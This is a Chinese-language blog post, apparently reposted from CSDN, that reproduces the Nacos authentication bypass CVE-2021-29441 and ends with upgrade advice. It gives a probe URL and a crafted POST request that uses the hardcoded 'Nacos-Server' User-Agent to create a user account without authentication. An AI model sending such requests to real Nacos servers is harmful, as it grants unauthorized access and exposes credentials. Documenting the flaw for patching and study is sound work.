【Nacos未授权访问漏洞(CVE-2021-29441)复现】


一、声明

本文仅供学习参考,其中涉及的一切资源均来源于网络,请勿用于任何非法行为,否则您将自行承担相应后果,本人不承担任何法律及连带责任。


二、漏洞描述

Nacos 是阿里巴巴推出来的一个新开源项目,是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。

该漏洞发生在nacos在进行认证授权操作时,会判断请求的user-agent是否为”Nacos-Server”,如果是的话则不进行任何认证。
开发者原意是用来处理一些服务端对服务端的请求。但是由于配置的过于简单,并且将协商好的user-agent设置为Nacos-Server,直接硬编码在了代码里,导致了漏洞的出现。并且利用这个未授权漏洞,攻击者可以获取到用户名密码等敏感信息


三、漏洞影响范围

Nacos版本<=Nacos 2.0.0-ALPHA.1


四、漏洞复现

1、来到登陆界面
在这里插入图片描述
2、验证是否可能存在漏洞
未登陆情况下浏览器访问如下接口

http://x.x.x.x/nacos/v1/auth/users?pageNo=1&pageSize=1

在这里插入图片描述出现这种界面就很可能存在漏洞

3、抓包修改数据包

POST /nacos/v1/auth/users?username=test10&password=test10
User-Agent: Nacos-Server
pageNo=1&pageSize=9

在这里插入图片描述
发现创建用户成功

4、返回登陆界面登陆
在这里插入图片描述


五、修复建议

升级到最新版本的 Nacos

猜你喜欢

转载自blog.csdn.net/qq_61872115/article/details/134057381
今日推荐